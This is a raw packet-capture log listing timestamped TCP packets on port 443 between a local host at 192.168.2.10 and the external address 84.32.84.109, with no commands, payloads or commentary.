Oct 9, 2024 16:16:05.113384008 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.113481045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.113523960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.113600016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.113646984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.113709927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.113759995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.113931894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.113976002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114037037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114084005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114137888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114180088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114224911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114269018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114304066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114350080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114363909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114412069 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114423037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114465952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114505053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114595890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114605904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114615917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114631891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114650965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.114685059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.114691973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.115245104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.135883093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.136025906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.136044979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.136063099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.136082888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.136111975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.136123896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.136130095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.136167049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.136185884 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.136226892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.136231899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.136267900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.160707951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.160773039 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.160779953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.160790920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.160828114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.160851955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.160857916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.160876989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.160913944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.194340944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.194431067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.194457054 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.194464922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.194495916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.194525003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.194550991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.194555998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.194566965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.194572926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.194618940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.194622993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.194660902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.195575953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.195638895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.195667982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.195672989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.195691109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.196060896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.200040102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.200113058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.200119019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.200167894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.200608969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.200670004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.200716019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.200772047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.200839043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.200898886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.200903893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201105118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.201433897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201541901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.201554060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201608896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.201633930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201678991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.201729059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201776981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.201848984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201900959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.201911926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201952934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201966047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.201968908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.201988935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.202044010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.202086926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.202090025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.202131033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.202138901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.202183962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.202222109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.202270031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.202279091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.202322006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.202326059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.202368975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.223572016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.223651886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.223671913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.223673105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.223685026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.223700047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.223707914 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.248191118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.248249054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.248296022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.248316050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.248325109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.248337984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.248357058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.248456955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.248461962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.282485008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.282567978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.282574892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.282588005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.282638073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.282661915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.282676935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.282676935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.282689095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.282749891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.283344030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.283590078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.283603907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.283612967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.283634901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.287609100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.287662983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.287678003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.287686110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.287702084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.288275957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.288326025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.288332939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.288376093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.288378000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.288393974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.288419962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.288491011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.288537979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.288544893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.288587093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.288595915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.288640976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.288885117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.288934946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.288981915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289030075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289083004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289134026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289153099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289201975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289213896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289263010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289508104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289560080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289650917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289700985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289705038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289714098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289781094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289803028 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289809942 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289835930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289863110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289885998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.289891958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.289915085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.290074110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.290122032 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.290127993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.290163040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.290170908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.290178061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.290199995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.311268091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.311319113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.311348915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.311374903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.311386108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.311408043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.311419010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.311436892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.311444998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.311455011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.335810900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.335865974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.335877895 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.335890055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.335911036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.335920095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.335958958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.335963011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.336002111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.336014032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.336065054 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.370049000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.370201111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.370224953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.370234013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.370253086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.370260000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.370311975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.370317936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.370343924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.370359898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.370364904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.370387077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.370870113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.370956898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.370964050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.371135950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.371328115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.371409893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.375226021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.375324965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.375376940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.375421047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.375952005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.376058102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.376106977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.376192093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.376226902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.376313925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.376336098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.376344919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.376368999 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.377567053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.377620935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.377630949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.377690077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.377784967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.377923965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.377945900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.377952099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.377971888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378046036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378067970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378076077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378094912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378189087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378232002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378238916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378259897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378278971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378283978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378298044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378374100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378417969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378424883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378463984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378492117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378570080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378572941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378582001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378608942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378640890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378647089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378653049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378700018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378707886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378715038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378741026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378757954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378782988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.378789902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.378801107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.399732113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.399791956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.399801016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.399842978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.399859905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.399899960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.399940968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.399991035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.400015116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.400078058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.423650026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.423708916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.423733950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.423741102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.423753023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.423767090 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.423805952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.423810959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.423878908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.423896074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.423902988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.423923016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.458184958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458242893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458257914 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.458267927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458287001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458308935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.458317995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458332062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458338976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.458350897 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.458354950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458379984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.458786964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458898067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458923101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.458930969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.458941936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.463320017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463365078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463428020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.463437080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463460922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.463696957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463736057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463754892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.463761091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463773012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.463777065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.463819981 CEST	49723	443	192.168.2.10	84.32.84.109
